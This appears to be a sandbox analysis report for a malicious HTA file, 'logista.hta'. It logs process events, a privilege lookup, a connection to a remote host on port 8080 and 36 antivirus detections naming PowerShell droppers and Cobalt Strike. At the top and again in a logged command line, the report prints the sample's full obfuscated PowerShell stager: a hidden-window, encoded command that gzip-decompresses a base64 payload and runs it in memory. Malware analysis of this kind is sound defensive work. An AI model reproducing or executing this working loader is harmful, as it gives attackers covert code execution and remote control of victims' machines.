AMgAyAHQAdgBqAHkAMABCAC8AdgBPAGcAMwAxAHEAWgBMAHoAYwBBAGgAeQBPAGEAaQBaAHQANQBtADMANwBhAE0AMwA0ADEASgByAEoAdwA2AHcALwBsADMAdABnAGQANQA5AE0AMQA2ADIAKwBwAEQAYgBCAHQAbQBvAGYAVQAzAHMAUwBQADQAcwBhAG4AagBkAEgAaAB0AGYASwBNAHIALwBGAEMARgB2AGgATwBMAFIAQwByAE0ALwBFAGQAbQBSAGsAVABEAGgAMABrAE4AbABkADQAVgB4AFgASABDADcAVwA0AGgATwBIAHoALwA2AHAAcQBwAEwAWgBZAE4AdgB0AGEAKwB3AEEAYgBQAHUATQBKAEUARQB1AGoAQQBjAGUAVABVAEIAbQBFAEQAdABnAHEAeABQAHQAQgBVAGYAYQBaAHUAMgB0ADEAWgBSAFQAUwBkAFgARgBxAGUATAB5AEIAcgB1AGgAWgBZADYAbQBWAEYAYgB2AGoAdABSAGQAUwA5AFoAMgBvAGMAeABPADMATABIAFEAYgB2AFMAcABRADAATwAvAGEAOQBqAEkAeQByAFIARABhADgAMAA5AGgAKwAwAEcAWQA3AE8AZQA4ADIAQgBpAHEAdABQAHAAbgBuAGEAeQBKAHoAbgA2AGEAbQB4AFEAbgBWAG0ANwBuADkAcgA4AGYAaABEAFAAcgBMADIANgBRAE4ANQBnAHMAdQBMAGQAZQB1AGQAeABKAGoAUgBFAGUAcwB3AHQATgBQADIANABZADMAVgBxAFkAZQByAHAAYwBhAGgAVABEAHkATwBXAEUAcgBVAEoAOQBUAFEAWQBjACsASgBNADMAUgAxAGwAbABzAGYARgBPAHMAUABqAFoAeQAxADkAWQBpAFoAMQBHAGYAegBwAE0AagBvAFYAUwB0AHIANABhAEcAcQA3AHoAbgB5AHkAYQBXAG0AcwBFAG8AeQBZAGMAUwByADIAZQBBAEYAeABLAFcAVQBPAEgAZABjAFoAYwA5ADMAZQBwAEcANAA5AG0ANQBRAG8ASwAvAHkAQwBVAGIAagA1AGcAcQBZAFcATQB1AHMAdgBVAGgAYgArAFgAMgBTAG4ASQBIAHQAVQBkAG4AcAB2AE0AbABrAG8AdgBUAEgAawB1AG0ANQByAHYAWABFAHEAagBiAGwAagBYADEAbgBYAHgAWQBtADcANgBFADMAMABRAEkAYgA1AE0AOAB1ADAAdwB2AG0AdQBTAHkAdQB1AFAARwBPADkAUgBiADcAVwBWADMAZAAxAEQAdgBTADQANgBTAFQAVQAyAEYAVAB1AGcANgAzAFIAMgBMAFYANwBZAEwAYwB4ADQAUgBZAEsANgA0AG0AYwBzAHEAdgBQAFEAQwBiAFIAZQBIAGUAZwBVAFUAOABNADIANQAzAEwAWABDAG8ATgBiAGUAQwBWAFEAaAAwAG4ARQAxAHIARwBkAGkAcgBwAHIARQBMAFAANgBhAGEAdABxAEQAdQA3AHAAKwBtAFcAeABOAE8AVQAxAHEATgBsAFIAVgBkADIASwByAGUAbQBOAEcAYQBkAHgANwAvAHAAMABRADEAdwBsAGQAdABJAFEAMgBlADMANQBaAG8ANgBOAFgAVQBlAGQATwA1AHgAdQB3ADMAbQBqAFoANgBBAE8ANQBsAHkAawBPAEsAdwAyADAAaABYAGUAMgBYAG0ASwBmADQAbwBmAEQAdwBjAEQAdgB6AHoASwBhAHcANwAyAFgAUQB4AGEAdQA0AGIASwAwAFkANwA4AGIAUQBwAFAAUABVADgAOQB4AGkAdgA5ADAAbABqADQAOABoAEQANgBzAEgAbwAyAHMAQgBUAGQAUwBvAFAAaABSAFAAdwBtAFkAcQAzAFEAawBQAGEAMgBoAHgAKwAzAEQAVABaAEgAdgBBAHcAOQBZAEkAMABCAGgANAA1AGQANwA2AFkANwBtAFAAZwBhAFMAYQB4AFEAaQBiAG4AWABEADEAaQBJACsAbwBXAFgASwAyAHYAMwBEADAAegBkAGwAbwBEAGMANgB2AEgAaQA4AGUAVwBsAEEAeQBhACsARwBSAE4AcQBLAE0AMABxAFEATwBXAE8AMQBGAFIATwBUAHkAQQB1AGMANwBxAC8ARgBRADQAKwBrAC8AcQBnAC8AQQAxAHIAMABtAHIASQBJAEkAdQA0ADMAVABLAG4AKwA1AC8ARQB2AG4AZwAzAHMAWABFAHAAZQA1AEEAdABZAEUAeQBWAGkAegBmADMAWgBIADUAOAAzAC8AWgBXAE0ATABLAFMAOQBHAHQAdgBaAHYAZQBtADAAYwB3ADEAbgB6AEkAQwAxAGgAUgA0AGcANwBHAHUAOABMADEAVwBRAGMAawBHAFYARwA4AE0AVgB3AG8AYQBOAEQARgBYAE4AOABnAFAAbwBqADQAUwB5ADgAeQBDAHAAeABjAG8AMQBMADUAdQBIADMAZQBvAGMAaABIAEwAcgBTAFcAMABIAHgAZQBLAHoAZgB0AHUAbwBHAFYAZAAwACsAZgB0AEQASABRAHkANQAwADcAcgBCAGQANABvAFMAWQB3AGIARABZACsASABKAEgARQBtAHkAQwAwAFQATwBlAFkAegBHAFMAMQBLAGoAcQBNAFMANABUAFgAUgB1AHMAcQArAE8AWABMAEEAcwBLAHIAdgBpAEUANABSAFAANABhAGIANgBvAEUAZABXAHgAUwBGAEoAWAAvAGIAMQBGAGsANgBjADkAQgBZAFkASQB3AHEAMQB5AE0AVgBmAFAAdQA2AHAAMABYAFAAMAA5AHgAaQAxAFAASQBDACsANQBSADQAbgB2AG8ALwB3AGoAOQBMADAAZgArAGQAMQBCAHoAMgBJAHIAMgA3AEEAMgAwAHcAcQBHAFAAawBTAEoATAA1AFcAKwBsAGsAcgBBAGkAMwBxADMASAB6AGcAawArAFAAdABDAGUANgBCAFMAYwBpADQASABuACsASAA0AGIAbQBQAEMAbABVAGoAeQA5AGwAVgB1AEQASgBBAFIAdQBSAHQAdwBhAHgAQQAvAGkASABzAEsAagA0ADIAWQBEAFAAbABlAGkAZABaAEsALwB3ADgAVABQAEwANwBEAHYAUgBHAG8ANABaACsAWAB2AGgASQBJAHMAQgBCADMAMAB2AFIAaQBZAHcARgBFAEUATABWAFYAdQB2AGoAQgAwAFYAWQBEADEAZgB3AEgALwBwAFUAVwBpADIAZwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AAoA

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 30, 2024, 9:42 a.m.	show_type: 0 filepath_r: powershell parameters: -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhAFcALwBpAFQAQgBMACsASABIADYARgBQADAAUQBDAEsANABRADEAUgB3AGkAWgAxAFUAaABqAGYASQBBAE4AZABzAEEAMgA1AG4AcQBqAHkARQBjAEQAQgBsAC8AWQBiAFkAeAA1AFoALwA3ADcAbABnADEAawBNAGoAdgBKADcAawBpADcAawBWAEQANgBxAEsAcQB1AGUAdQByAHAANgByAEsASwA4AEwAMgBLAEkAOABmAEMAVQBtAEEAagA0AGwANQBIAFUAZQB3AEUAUAB0AEUAbwBsAFcANAA5AFkANABjAGMASABBAGYARQBWACsASgBiAHUAYgBSAEsAZgBBAHYAbgBXAC8AbgBnAGQAWQAzAHcAYQB4AGcARgAxAHEAdABoADIAeABHAEsAWQArAEwAdgAwAHMAMwBJAGkAQQB5AFAAcQBOAHcAZQBqAE8AagBWAEMAKwB6AEUAUgBWAFcAaQBtAE8AUwBDAHkARQA0AGkAUgBOADcAYwBsAEcANgBLAHAAYwBTAFAAagBSAFYANgA5AFEAMwBzAEgATgBDAHIAaAAvAEEAbQBzAEcATQA0AHEATABLAGsAdwA1AEEATgBQAE0AUAB4AFgANwA1ADgAWQBaAEkAbwBRAGoANAArAHoAMgBzADkAaABPAGsANABSAHAANwBwAE8AaQBpAHUAawBNAFIAMwBZAHIAcABCAEUAYgBwAC8ATgByAGYASQB3AHMAVABmAHgATwAxAHIAcgBlAGMARwBwAHUARgBlAHgARABMAEcAcwBEAFkAUQBGAE8AMwBiACsAZAA0AHcAcwBJAHcAOABnAHAAbwBhAHUAZwA2AHUAbABQAC8ANgBxADAAdwB1ADcAKwBzAHYATgBXADYAZgBHAEcANQBjAEsAYQB0AFoAagBKAEYAWABzADEAMgAzAFQAQgBJAC8AeQBQAHgAQQBMAFEAdABSAHAAUwB3ADUAVgBoAFQARQB3AFEAcgBYAHAAbwA3AGYAYgBOAFEAbQBoAGYAZAB5ADQAYgB4ADAAOQByADEATQBYAGkASgBiAGgAdwBiAEUAOABYAG0AUQB1AGQAVwB6AFQAcQBVAE0AdwB4AEYAZwBRADUAOAB4AEwARgBlAEoAWgBYADcAZQA4AHUAVwBGACsAUABiAG0AagBaAEwANAAyAFAARgBRAFQAZgBBAHgAaQBvAEoAUQBSAGQASABCAHMAVgBCAGMANgB4AHUAKwA3AFMASQBGAHIAVQBDAHQASABFAE0ASwAvAFgAVwBaAEIAQwBjAGkAaABKAFAASQBKADYANgArAGcATgA0AGgAMgBLAEgASwByAFoAKwA0AGIAaABYAHMATAB2AC8AVQA3AGsAdABGAFIAdQBrAFYAMwBEADkAVgBxAHIAeABYAEEAcQBrAFIAagBzAGoAcQBoAFIATgAvAEEAbwBkAFUAOABPAFoAcwBEAHMATAA1AHoAZgB0ADMANQBDAEwAaAA3AHoAZQBDAGsAYQBVAGYAcABRACsAbwBhAGkATQBYAHIAUQAyAE0AWABqAEgAZwArADQANgByAHAAWgB1AGIAWgBUAEYARQBFAEUAOQBsAEYATQBSAE8AbwBmAGUAVgBvAEsAcQBFAEIARQA0AFkATwBJAGkAeQBQAEoAMQBhAGwAQwBEAHkANQBXAGQAKwB6AHMAZABlAE4AZQBQAHEAcAA0AGIAcQBWADYAMgBMAHoAagBrADkAWgB6ACsAKwBFAGsAcwA5AGMATwB5AFgAMABnADEAWgB1AHIAQQBuAFgAMwA4ADEARQA4AGUAMQBVAFoAVAB2AGYAMwA0AGIAVwBMAFIAeQBmAE0AUgBtAHYAdQBFADUAMQBwAFgAdwBsAFkAOQB5AGgAbABZAHUASwB2AEMAbwBYAGMAVgBrADgATABOAFMAdgBtAHcAZwBtADcAMgBnAFUAOAA0AEIAWABmADYAdQB4AG4AawBPAGYAdABQAHQAbgBwADIAagBMAGMAaAA3AEQARgA0AEIASgBjAGgAZgBuAFQAbgBuAHMARgBJAFcAZgBBAGwANQBnAE4AOQA1AEQAagBTADkAWABjAEUAMQBRADEAZgBwAHkAOQBYAEsAcgBxAGYAbgA4ADUAegBMAGoARwB2AEUAYwBaAFUAWQBKAFgARABQAHIAUwBxAGgASQBzAE4ARgBkAHAAVwBnAC8AZABpADUAYgBOAEUASgBEAG8AcABoACsAYQBlADcAVQB1AEoAaQB4AHoASgBpAGYARABYADMAUQBuADQAQQA2AGUAVgBvAEoAdgBEAGgAeABpAFEAVwBaAEIAZABnADAATgBRAFEAVwBZADcAaAA1AHEAaABVAGkAYgA1AGoAbwAyADYAbQBPAHUAdQByAEMAKwBVAFAATQBXAEUATQAxADQAVQByAEIANQBZAE8AawBCAE4AWQB5AGIARgBRAGMAYwA2AFoAeQBLADcAKwBPAHoALwBJAG0AbwBxAHcANABJAFUAdQA4AGsAQwA2AHEARQBLADgAYQA2AHkAaAA1AGwAeAB1AFYARQBFADMAWQA0ADMAcwA4AG4AOQB3ACsAMwBwAFAAegBwAGMAaQB4ACsAbwBLADAAagB1AG4AZwBRAEMAcQBHACsAQQBxAG8AVABzAFIAaAByAHAAVwByAHYANQBHAHYAUAAvAE4AdgBWADkATAB6AEMAOQB1AE0AaABHADYASgBMAEoAUwBYAE0AUgBsAE4AOABQADUAZABiAGsAOQB2AEYAcgA1ADgALwBMADEARABjAGsAQwB0AHcAZwBEAFoAbgB3AFUAZQBGADAAagBSAHUAMgBXAFcAaABTAHgAUwByAG4AWgBTAGYAWgBDAEoAbQAzAEgANwBhAGoASABIAGYAagArAHYAcwA5AHAAOABEAHYAQQByADcAbgBuAHUAZQBGAFEAVgBNAEsAdQBNAHIAUwA0ADUASABuAFUAcAA4AFMAVgBNAE8ANgB3AHIAUwBSAE4AaABFAFQAcgBVAGsAMgBlAEEAcgBuAFQAdgBzAGUAdABoAE0ATgB6AE0ASwA4AG4AWABxAHQAdQBoADgASgBCAGgAcgBYADQAYwBkACsAUABXAGUASABBADAAdgAzAEcAUAB1AEQAYgBhACsAZgBwAFkAdQBlAHMAUAB6AGIAVAB1AGoAawBUACsARQBlAHoAeAA3AGYANgBlAHMAegBuADgAbgAzAGgAMABPAFgAMwB6AEYATQBBADQAMwA4AEkAQgB5AFkAUQBRAGEALwBUAEQAdgAxAHUAYQByAGMAUQBKADcAYgBSAGIARwBpAGwAVABkAHgAQgB4AHYAcQBZAEQAZgBRADcAbABhAHIAMwA5AEUAdwBlADYAbAB3AG8AcQA3ADQAOQBOAE8AdABqAFgAcABSAFAARABRADQAZgBLAGIAdQB2AFUARABZAFgATAAyAHgAOQB6AHoAVgBIADUAaQBDAEUATwBJAFgAbQBXAG0AMwA3AFkAcQBhAHEAMwBjAHoAYQBKAGEAYwBSAEkAMgAyAHQAdgBqAHkAMABCAC8AdgBPAGcAMwAxAHEAWgBMAHoAYwBBAGgAeQBPAGEAaQBaAHQANQBtADMANwBhAE0AMwA0ADEASgByAEoAdwA2AHcALwBsADMAdABnAGQANQA5AE0AMQA2ADIAKwBwAEQAYgBCAHQAbQBvAGYAVQAzAHMAUwBQADQAcwBhAG4AagBkAEgAaAB0AGYASwBNAHIALwBGAEMARgB2AGgATwBMAFIAQwByAE0ALwBFAGQAbQBSAGsAVABEAGgAMABrAE4AbABkADQAVgB4AFgASABDADcAVwA0AGgATwBIAHoALwA2AHAAcQBwAEwAWgBZAE4AdgB0AGEAKwB3AEEAYgBQAHUATQBKAEUARQB1AGoAQQBjAGUAVABVAEIAbQBFAEQAdABnAHEAeABQAHQAQgBVAGYAYQBaAHUAMgB0ADEAWgBSAFQAUwBkAFgARgBxAGUATAB5AEIAcgB1AGgAWgBZADYAbQBWAEYAYgB2AGoAdABSAGQAUwA5AFoAMgBvAGMAeABPADMATABIAFEAYgB2AFMAcABRADAATwAvAGEAOQBqAEkAeQByAFIARABhADgAMAA5AGgAKwAwAEcAWQA3AE8AZQA4ADIAQgBpAHEAdABQAHAAbgBuAGEAeQBKAHoAbgA2AGEAbQB4AFEAbgBWAG0ANwBuADkAcgA4AGYAaABEAFAAcgBMADIANgBRAE4ANQBnAHMAdQBMAGQAZQB1AGQAeABKAGoAUgBFAGUAcwB3AHQATgBQADIANABZADMAVgBxAFkAZQByAHAAYwBhAGgAVABEAHkATwBXAEUAcgBVAEoAOQBUAFEAWQBjACsASgBNADMAUgAxAGwAbABzAGYARgBPAHMAUABqAFoAeQAxADkAWQBpAFoAMQBHAGYAegBwAE0AagBvAFYAUwB0AHIANABhAEcAcQA3AHoAbgB5AHkAYQBXAG0AcwBFAG8AeQBZAGMAUwByADIAZQBBAEYAeABLAFcAVQBPAEgAZABjAFoAYwA5ADMAZQBwAEcANAA5AG0ANQBRAG8ASwAvAHkAQwBVAGIAagA1AGcAcQBZAFcATQB1AHMAdgBVAGgAYgArAFgAMgBTAG4ASQBIAHQAVQBkAG4AcAB2AE0AbABrAG8AdgBUAEgAawB1AG0ANQByAHYAWABFAHEAagBiAGwAagBYADEAbgBYAHgAWQBtADcANgBFADMAMABRAEkAYgA1AE0AOAB1ADAAdwB2AG0AdQBTAHkAdQB1AFAARwBPADkAUgBiADcAVwBWADMAZAAxAEQAdgBTADQANgBTAFQAVQAyAEYAVAB1AGcANgAzAFIAMgBMAFYANwBZAEwAYwB4ADQAUgBZAEsANgA0AG0AYwBzAHEAdgBQAFEAQwBiAFIAZQBIAGUAZwBVAFUAOABNADIANQAzAEwAWABDAG8ATgBiAGUAQwBWAFEAaAAwAG4ARQAxAHIARwBkAGkAcgBwAHIARQBMAFAANgBhAGEAdABxAEQAdQA3AHAAKwBtAFcAeABOAE8AVQAxAHEATgBsAFIAVgBkADIASwByAGUAbQBOAEcAYQBkAHgANwAvAHAAMABRADEAdwBsAGQAdABJAFEAMgBlADMANQBaAG8ANgBOAFgAVQBlAGQATwA1AHgAdQB3ADMAbQBqAFoANgBBAE8ANQBsAHkAawBPAEsAdwAyADAAaABYAGUAMgBYAG0ASwBmADQAbwBmAEQAdwBjAEQAdgB6AHoASwBhAHcANwAyAFgAUQB4AGEAdQA0AGIASwAwAFkANwA4AGIAUQBwAFAAUABVADgAOQB4AGkAdgA5ADAAbABqADQAOABoAEQANgBzAEgAbwAyAHMAQgBUAGQAUwBvAFAAaABSAFAAdwBtAFkAcQAzAFEAawBQAGEAMgBoAHgAKwAzAEQAVABaAEgAdgBBAHcAOQBZAEkAMABCAGgANAA1AGQANwA2AFkANwBtAFAAZwBhAFMAYQB4AFEAaQBiAG4AWABEADEAaQBJACsAbwBXAFgASwAyAHYAMwBEADAAegBkAGwAbwBEAGMANgB2AEgAaQA4AGUAVwBsAEEAeQBhACsARwBSAE4AcQBLAE0AMABxAFEATwBXAE8AMQBGAFIATwBUAHkAQQB1AGMANwBxAC8ARgBRADQAKwBrAC8AcQBnAC8AQQAxAHIAMABtAHIASQBJAEkAdQA0ADMAVABLAG4AKwA1AC8ARQB2AG4AZwAzAHMAWABFAHAAZQA1AEEAdABZAEUAeQBWAGkAegBmADMAWgBIADUAOAAzAC8AWgBXAE0ATABLAFMAOQBHAHQAdgBaAHYAZQBtADAAYwB3ADEAbgB6AEkAQwAxAGgAUgA0AGcANwBHAHUAOABMADEAVwBRAGMAawBHAFYARwA4AE0AVgB3AG8AYQBOAEQARgBYAE4AOABnAFAAbwBqADQAUwB5ADgAeQBDAHAAeABjAG8AMQBMADUAdQBIADMAZQBvAGMAaABIAEwAcgBTAFcAMABIAHgAZQBLAHoAZgB0AHUAbwBHAFYAZAAwACsAZgB0AEQASABRAHkANQAwADcAcgBCAGQANABvAFMAWQB3AGIARABZACsASABKAEgARQBtAHkAQwAwAFQATwBlAFkAegBHAFMAMQBLAGoAcQBNAFMANABUAFgAUgB1AHMAcQArAE8AWABMAEEAcwBLAHIAdgBpAEUANABSAFAANABhAGIANgBvAEUAZABXAHgAUwBGAEoAWAAvAGIAMQBGAGsANgBjADkAQgBZAFkASQB3AHEAMQB5AE0AVgBmAFAAdQA2AHAAMABYAFAAMAA5AHgAaQAxAFAASQBDACsANQBSADQAbgB2AG8ALwB3AGoAOQBMADAAZgArAGQAMQBCAHoAMgBJAHIAMgA3AEEAMgAwAHcAcQBHAFAAawBTAEoATAA1AFcAKwBsAGsAcgBBAGkAMwBxADMASAB6AGcAawArAFAAdABDAGUANgBCAFMAYwBpADQASABuACsASAA0AGIAbQBQAEMAbABVAGoAeQA5AGwAVgB1AEQASgBBAFIAdQBSAHQAdwBhAHgAQQAvAGkASABzAEsAagA0ADIAWQBEAFAAbABlAGkAZABaAEsALwB3ADgAVABQAEwANwBEAHYAUgBHAG8ANABaACsAWAB2AGgASQBJAHMAQgBCADMAMAB2AFIAaQBZAHcARgBFAEUATABWAFYAdQB2AGoAQgAwAFYAWQBEADEAZgB3AEgALwBwAFUAVwBpADIAZwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AAoA filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 30, 2024, 9:42 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Creates a suspicious Powershell process (4 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

92.63.193.141:8080

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Lionic	Trojan.Script.PowerShell.4!c
Cynet	Malicious (score: 99)
CAT-QuickHeal	VBS.Trojan.Script.38976
Skyhigh	BehavesLike.HTML.Dropper.zr
ALYac	VBS.Heur.Asthma.2.44D1FBF5.Gen
VIPRE	VBS.Heur.Asthma.2.44D1FBF5.Gen
Sangfor	Malware.Generic-VBS.Save.a30bb57f
Arcabit	VBS.Heur.Asthma.2.44D1FBF5.Gen
Symantec	ISB.Downloader!gen56
ESET-NOD32	PowerShell/Kryptik.EJ
McAfee	PS/Injector.d
Avast	Script:SNH-gen [Drp]
ClamAV	Html.Trojan.CobaltStrike-7932563-0
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	VBS.Heur.Asthma.2.44D1FBF5.Gen
NANO-Antivirus	Trojan.Html.Downloader.inailz
MicroWorld-eScan	VBS.Heur.Asthma.2.44D1FBF5.Gen
Rising	Dropper.Ploty!8.EEC8 (TOPIS:E0:A2riDZuTTpG)
Emsisoft	VBS.Heur.Asthma.2.44D1FBF5.Gen (B)
F-Secure	Malware.VBS/Dldr.Agent.vrfx
DrWeb	VBS.Starter.296
FireEye	VBS.Heur.Asthma.2.44D1FBF5.Gen
Sophos	ATK/PSInject-Q
Ikarus	Trojan.PowerShell.Crypt
Google	Detected
Avira	VBS/Dldr.Agent.vrfx
Kingsoft	Script.Ks.Malware.2618
Xcitium	TrojWare.Win32.BadShell.XSQ@7pmj24
Microsoft	TrojanDropper:PowerShell/Ploty.I
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	Script.Trojan.Agent.AQW
Varist	VBS/Agent.BCY!Eldorado
Tencent	Heur:Trojan.Powershell.Generic.w
MAX	malware (ai score=86)
Fortinet	PowerShell/Injector.D!tr
AVG	Script:SNH-gen [Drp]

logista.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All